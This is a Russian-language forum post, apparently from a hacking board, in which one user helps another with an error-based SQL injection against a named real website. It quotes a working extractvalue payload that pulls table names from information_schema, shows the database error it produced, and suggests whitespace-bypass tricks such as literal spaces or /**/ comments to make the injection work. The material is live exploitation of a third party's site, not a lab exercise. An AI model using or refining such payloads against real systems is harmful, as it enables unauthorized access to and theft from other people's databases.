29.08.2016, 20:22
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами:
7502006
Репутация:
90
|
|
Сообщение от NonBlizz
↑
Вот пример:
Код:
http://ppt.ru/info/1'or%0aextractvalue(1,concat(0x3a,(select%0atable_name%0afrom%0ainformation_schema.tables%0alimit%0a0,1)))='1
Код ошибки:
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%0aextractvalue(1,concat(0x3a,(select%0atable_nam e%0afrom%0ainformation_schema.t' at line 1
судя по ошибке дело в том что данные попадают напрямую в запрос, без урлэнкода, в принципе ты можешь попробовать просто написать пробел вместо %20, ну или использовать аналог пробела /**/
|
|
|